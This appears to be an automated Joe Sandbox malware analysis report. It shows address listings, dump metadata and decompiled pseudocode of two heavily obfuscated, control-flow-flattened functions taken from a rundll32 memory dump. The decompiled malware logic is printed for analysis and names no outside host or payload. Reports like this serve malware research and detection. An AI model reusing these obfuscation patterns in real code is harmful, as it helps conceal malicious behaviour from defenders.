                                                                                                                                    0x002d9860
                                                                                                                                    0x002d9867
                                                                                                                                    0x002d9872
                                                                                                                                    0x002d987a
                                                                                                                                    0x002d9883
                                                                                                                                    0x002d9887
                                                                                                                                    0x002d988c
                                                                                                                                    0x002d9894
                                                                                                                                    0x002d989c
                                                                                                                                    0x002d98a0
                                                                                                                                    0x002d98a8
                                                                                                                                    0x002d98b5
                                                                                                                                    0x002d98b9
                                                                                                                                    0x002d98c1
                                                                                                                                    0x002d98c9
                                                                                                                                    0x002d98d1
                                                                                                                                    0x002d98d9
                                                                                                                                    0x002d98e1
                                                                                                                                    0x002d98ef
                                                                                                                                    0x002d98f3
                                                                                                                                    0x002d98f8
                                                                                                                                    0x002d9900
                                                                                                                                    0x002d9908
                                                                                                                                    0x002d990d
                                                                                                                                    0x002d9915
                                                                                                                                    0x002d991d
                                                                                                                                    0x002d9927
                                                                                                                                    0x002d992b
                                                                                                                                    0x002d992f
                                                                                                                                    0x002d9937
                                                                                                                                    0x002d993f
                                                                                                                                    0x002d9947
                                                                                                                                    0x002d994f
                                                                                                                                    0x002d9957
                                                                                                                                    0x002d995f
                                                                                                                                    0x002d9967
                                                                                                                                    0x002d9974
                                                                                                                                    0x002d9978
                                                                                                                                    0x002d997d
                                                                                                                                    0x002d9985
                                                                                                                                    0x002d998d
                                                                                                                                    0x002d9991
                                                                                                                                    0x002d999e
                                                                                                                                    0x002d99a2
                                                                                                                                    0x002d99aa
                                                                                                                                    0x002d99b2
                                                                                                                                    0x002d99b7
                                                                                                                                    0x002d99bc
                                                                                                                                    0x002d99c4
                                                                                                                                    0x002d99cc
                                                                                                                                    0x002d99cc
                                                                                                                                    0x002d99da
                                                                                                                                    0x002d9afd
                                                                                                                                    0x002d9b06
                                                                                                                                    0x002d9b0d
                                                                                                                                    0x002d9b0e
                                                                                                                                    0x002d9b15
                                                                                                                                    0x002d9b1c
                                                                                                                                    0x002d9b23
                                                                                                                                    0x002d9b32
                                                                                                                                    0x002d9b3d
                                                                                                                                    0x002d9b49
                                                                                                                                    0x002d9b54
                                                                                                                                    0x002d9b62
                                                                                                                                    0x002d9b69
                                                                                                                                    0x002d9b70
                                                                                                                                    0x002d9b74
                                                                                                                                    0x002d9b76
                                                                                                                                    0x002d9b79
                                                                                                                                    0x00000000
                                                                                                                                    0x002d99e0
                                                                                                                                    0x002d99e6
                                                                                                                                    0x002d9a87
                                                                                                                                    0x002d9a90
                                                                                                                                    0x002d9a98
                                                                                                                                    0x002d9a9e
                                                                                                                                    0x002d9aac
                                                                                                                                    0x002d9ac3
                                                                                                                                    0x002d9ad6
                                                                                                                                    0x002d9aeb
                                                                                                                                    0x002d9af0
                                                                                                                                    0x002d9af3
                                                                                                                                    0x00000000
                                                                                                                                    0x002d99ec
                                                                                                                                    0x002d99f2
                                                                                                                                    0x002d9bba
                                                                                                                                    0x002d99f8
                                                                                                                                    0x002d99fe
                                                                                                                                    0x002d9a6d
                                                                                                                                    0x002d9a72
                                                                                                                                    0x002d9a74
                                                                                                                                    0x002d9a77
                                                                                                                                    0x002d9a7a
                                                                                                                                    0x002d9a80
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a80
                                                                                                                                    0x002d9a00
                                                                                                                                    0x002d9a06
                                                                                                                                    0x002d9a31
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a08
                                                                                                                                    0x002d9a0e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a14
                                                                                                                                    0x002d9a24
                                                                                                                                    0x002d9a2a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a2a
                                                                                                                                    0x002d9a0e
                                                                                                                                    0x002d9a06
                                                                                                                                    0x002d99fe
                                                                                                                                    0x002d99f2
                                                                                                                                    0x002d99e6
                                                                                                                                    0x002d9bc5
                                                                                                                                    0x002d9bce
                                                                                                                                    0x002d9bce
                                                                                                                                    0x002d9b88
                                                                                                                                    0x002d9b8f
                                                                                                                                    0x002d9b94
                                                                                                                                    0x002d9b9b
                                                                                                                                    0x002d9b9b
                                                                                                                                    0x002d9b9b
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HwP$QjTF$aH3
                                                                                                                                    • API String ID: 0-3950587752
                                                                                                                                    • Opcode ID: 7d5fa79a37f13ac2799d8d5334ca98fa4fdb8a289eaa83b54273813434884abf
                                                                                                                                    • Instruction ID: 2cba7bbf03e7401c339d5ba89124bf19420b602c82d897491e3bcaa851091f02
                                                                                                                                    • Opcode Fuzzy Hash: 7d5fa79a37f13ac2799d8d5334ca98fa4fdb8a289eaa83b54273813434884abf
                                                                                                                                    • Instruction Fuzzy Hash: 3CE11F714093819FD768CF25D58A65BBBE1FBC4748F208E1EF29686260D7B18989CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CB2C7 Relevance: 4.0, Strings: 3, Instructions: 235COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002CB2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E002C7FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E002D4B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E002D6DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E002DD97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E002D0E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x2e3208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E002D0B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E002CB74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E002D1889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E002C9714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E002CF09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E002CE5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E002C3DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}





































                                                                                                                                    0x002cb2d1
                                                                                                                                    0x002cb2d8
                                                                                                                                    0x002cb2d9
                                                                                                                                    0x002cb2da
                                                                                                                                    0x002cb2df
                                                                                                                                    0x002cb2e7
                                                                                                                                    0x002cb2f0
                                                                                                                                    0x002cb2f2
                                                                                                                                    0x002cb303
                                                                                                                                    0x002cb308
                                                                                                                                    0x002cb30e
                                                                                                                                    0x002cb316
                                                                                                                                    0x002cb31e
                                                                                                                                    0x002cb326
                                                                                                                                    0x002cb32e
                                                                                                                                    0x002cb336
                                                                                                                                    0x002cb33e
                                                                                                                                    0x002cb346
                                                                                                                                    0x002cb34e
                                                                                                                                    0x002cb356
                                                                                                                                    0x002cb35e
                                                                                                                                    0x002cb366
                                                                                                                                    0x002cb36e
                                                                                                                                    0x002cb376
                                                                                                                                    0x002cb37e
                                                                                                                                    0x002cb386
                                                                                                                                    0x002cb38b
                                                                                                                                    0x002cb393
                                                                                                                                    0x002cb39b
                                                                                                                                    0x002cb3a7
                                                                                                                                    0x002cb3ac
                                                                                                                                    0x002cb3b2
                                                                                                                                    0x002cb3ba
                                                                                                                                    0x002cb3c7
                                                                                                                                    0x002cb3ca
                                                                                                                                    0x002cb3d6
                                                                                                                                    0x002cb3df
                                                                                                                                    0x002cb3e0
                                                                                                                                    0x002cb3e4
                                                                                                                                    0x002cb3ec
                                                                                                                                    0x002cb3f4
                                                                                                                                    0x002cb3fc
                                                                                                                                    0x002cb401
                                                                                                                                    0x002cb409
                                                                                                                                    0x002cb411
                                                                                                                                    0x002cb419
                                                                                                                                    0x002cb421
                                                                                                                                    0x002cb429
                                                                                                                                    0x002cb431
                                                                                                                                    0x002cb439
                                                                                                                                    0x002cb441
                                                                                                                                    0x002cb449
                                                                                                                                    0x002cb457
                                                                                                                                    0x002cb45b
                                                                                                                                    0x002cb45f
                                                                                                                                    0x002cb467
                                                                                                                                    0x002cb46f
                                                                                                                                    0x002cb477
                                                                                                                                    0x002cb477
                                                                                                                                    0x002cb47d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb483
                                                                                                                                    0x002cb483
                                                                                                                                    0x002cb56e
                                                                                                                                    0x002cb56f
                                                                                                                                    0x002cb572
                                                                                                                                    0x002cb578
                                                                                                                                    0x002cb57c
                                                                                                                                    0x002cb57e
                                                                                                                                    0x002cb520
                                                                                                                                    0x002cb520
                                                                                                                                    0x002cb525
                                                                                                                                    0x002cb477
                                                                                                                                    0x002cb477
                                                                                                                                    0x002cb477
                                                                                                                                    0x002cb47d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb47d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb6b6
                                                                                                                                    0x002cb6b6
                                                                                                                                    0x002cb6b6
                                                                                                                                    0x002cb6c2
                                                                                                                                    0x002cb6ce
                                                                                                                                    0x002cb6ce
                                                                                                                                    0x002cb584
                                                                                                                                    0x002cb589
                                                                                                                                    0x002cb590
                                                                                                                                    0x002cb597
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb597
                                                                                                                                    0x002cb48f
                                                                                                                                    0x002cb546
                                                                                                                                    0x002cb54b
                                                                                                                                    0x002cb55b
                                                                                                                                    0x002cb4e6
                                                                                                                                    0x002cb4e6
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4e6
                                                                                                                                    0x002cb54d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb54d
                                                                                                                                    0x002cb49b
                                                                                                                                    0x002cb52a
                                                                                                                                    0x002cb52f
                                                                                                                                    0x002cb53f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb53f
                                                                                                                                    0x002cb531
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb531
                                                                                                                                    0x002cb4a3
                                                                                                                                    0x002cb510
                                                                                                                                    0x002cb515
                                                                                                                                    0x002cb518
                                                                                                                                    0x002cb51a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb51a
                                                                                                                                    0x002cb4ab
                                                                                                                                    0x002cb4df
                                                                                                                                    0x002cb4e4
                                                                                                                                    0x002cb4ee
                                                                                                                                    0x002cb4ee
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4e4
                                                                                                                                    0x002cb4af
                                                                                                                                    0x002cb4c8
                                                                                                                                    0x002cb4ce
                                                                                                                                    0x002cb4d5
                                                                                                                                    0x002cb4d7
                                                                                                                                    0x002cb4c4
                                                                                                                                    0x002cb4c4
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4c4
                                                                                                                                    0x002cb4b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4bf
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb59f
                                                                                                                                    0x002cb59f
                                                                                                                                    0x002cb5a5
                                                                                                                                    0x002cb698
                                                                                                                                    0x002cb69d
                                                                                                                                    0x002cb6af
                                                                                                                                    0x002cb6b4
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb6b4
                                                                                                                                    0x002cb69f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb69f
                                                                                                                                    0x002cb5ab
                                                                                                                                    0x002cb5b1
                                                                                                                                    0x002cb679
                                                                                                                                    0x002cb67e
                                                                                                                                    0x002cb68e
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb68e
                                                                                                                                    0x002cb680
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb680
                                                                                                                                    0x002cb5b7
                                                                                                                                    0x002cb5bd
                                                                                                                                    0x002cb658
                                                                                                                                    0x002cb65d
                                                                                                                                    0x002cb66f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb66f
                                                                                                                                    0x002cb65f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb65f
                                                                                                                                    0x002cb5c3
                                                                                                                                    0x002cb5c9
                                                                                                                                    0x002cb639
                                                                                                                                    0x002cb63e
                                                                                                                                    0x002cb64e
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb64e
                                                                                                                                    0x002cb640
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb640
                                                                                                                                    0x002cb5cb
                                                                                                                                    0x002cb5d1
                                                                                                                                    0x002cb61f
                                                                                                                                    0x002cb62a
                                                                                                                                    0x002cb632
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb632
                                                                                                                                    0x002cb5d3
                                                                                                                                    0x002cb5d9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb5f9
                                                                                                                                    0x002cb5fe
                                                                                                                                    0x002cb601
                                                                                                                                    0x002cb601

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: V$h5$kn=
                                                                                                                                    • API String ID: 0-2568719763
                                                                                                                                    • Opcode ID: de90a281a66467c0ee3f1301a25f3b6677fc913ec68bf46d8ecd13a1e64a1d71
                                                                                                                                    • Instruction ID: 103334b105198def60882d7468af3b1f042e7678fdade5a91d4bdc45bffb2efc
                                                                                                                                    • Opcode Fuzzy Hash: de90a281a66467c0ee3f1301a25f3b6677fc913ec68bf46d8ecd13a1e64a1d71
                                                                                                                                    • Instruction Fuzzy Hash: 44A1AC7012C341CBC729CF25D4A6A2FBBE0EB94308F144A2EF18696261D7758A19CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D4116 Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002D4116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E002C8F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E002C9350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E002D1E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E002DABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E002DDA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E002DC1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}











































                                                                                                                                    0x002d411c
                                                                                                                                    0x002d4126
                                                                                                                                    0x002d412e
                                                                                                                                    0x002d4136
                                                                                                                                    0x002d413e
                                                                                                                                    0x002d4146
                                                                                                                                    0x002d414e
                                                                                                                                    0x002d4156
                                                                                                                                    0x002d415e
                                                                                                                                    0x002d4166
                                                                                                                                    0x002d416e
                                                                                                                                    0x002d4176
                                                                                                                                    0x002d417e
                                                                                                                                    0x002d4183
                                                                                                                                    0x002d418b
                                                                                                                                    0x002d4193
                                                                                                                                    0x002d41a4
                                                                                                                                    0x002d41a8
                                                                                                                                    0x002d41aa
                                                                                                                                    0x002d41af
                                                                                                                                    0x002d41bb
                                                                                                                                    0x002d41be
                                                                                                                                    0x002d41c2
                                                                                                                                    0x002d41ca
                                                                                                                                    0x002d41da
                                                                                                                                    0x002d41de
                                                                                                                                    0x002d41e7
                                                                                                                                    0x002d41ec
                                                                                                                                    0x002d41f2
                                                                                                                                    0x002d41fa
                                                                                                                                    0x002d4202
                                                                                                                                    0x002d4207
                                                                                                                                    0x002d420f
                                                                                                                                    0x002d4214
                                                                                                                                    0x002d421c
                                                                                                                                    0x002d4224
                                                                                                                                    0x002d4230
                                                                                                                                    0x002d4233
                                                                                                                                    0x002d4237
                                                                                                                                    0x002d423f
                                                                                                                                    0x002d4247
                                                                                                                                    0x002d424f
                                                                                                                                    0x002d4254
                                                                                                                                    0x002d425c
                                                                                                                                    0x002d4264
                                                                                                                                    0x002d426c
                                                                                                                                    0x002d4274
                                                                                                                                    0x002d4279
                                                                                                                                    0x002d4281
                                                                                                                                    0x002d4289
                                                                                                                                    0x002d428e
                                                                                                                                    0x002d4296
                                                                                                                                    0x002d429b
                                                                                                                                    0x002d42a3
                                                                                                                                    0x002d42ab
                                                                                                                                    0x002d42b3
                                                                                                                                    0x002d42bb
                                                                                                                                    0x002d42c0
                                                                                                                                    0x002d42c8
                                                                                                                                    0x002d42d0
                                                                                                                                    0x002d42d8
                                                                                                                                    0x002d42dc
                                                                                                                                    0x002d42e4
                                                                                                                                    0x002d42f4
                                                                                                                                    0x002d42f9
                                                                                                                                    0x002d42ff
                                                                                                                                    0x002d430c
                                                                                                                                    0x002d4314
                                                                                                                                    0x002d431c
                                                                                                                                    0x002d4324
                                                                                                                                    0x002d432c
                                                                                                                                    0x002d4334
                                                                                                                                    0x002d4339
                                                                                                                                    0x002d4341
                                                                                                                                    0x002d4349
                                                                                                                                    0x002d4355
                                                                                                                                    0x002d435a
                                                                                                                                    0x002d4360
                                                                                                                                    0x002d4368
                                                                                                                                    0x002d4370
                                                                                                                                    0x002d4378
                                                                                                                                    0x002d4380
                                                                                                                                    0x002d4388
                                                                                                                                    0x002d4390
                                                                                                                                    0x002d4398
                                                                                                                                    0x002d43a0
                                                                                                                                    0x002d43a8
                                                                                                                                    0x002d43b0
                                                                                                                                    0x002d43b8
                                                                                                                                    0x002d43c0
                                                                                                                                    0x002d43cc
                                                                                                                                    0x002d43cf
                                                                                                                                    0x002d43d3
                                                                                                                                    0x002d43d7
                                                                                                                                    0x002d43df
                                                                                                                                    0x002d43df
                                                                                                                                    0x002d43f1
                                                                                                                                    0x002d44da
                                                                                                                                    0x00000000
                                                                                                                                    0x002d43f7
                                                                                                                                    0x002d43f9
                                                                                                                                    0x002d44b8
                                                                                                                                    0x002d44c1
                                                                                                                                    0x002d44c6
                                                                                                                                    0x002d44c8
                                                                                                                                    0x002d44cb
                                                                                                                                    0x002d44ce
                                                                                                                                    0x002d44d0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d44d0
                                                                                                                                    0x002d43ff
                                                                                                                                    0x002d4405
                                                                                                                                    0x002d445e
                                                                                                                                    0x002d446a
                                                                                                                                    0x002d447b
                                                                                                                                    0x002d447f
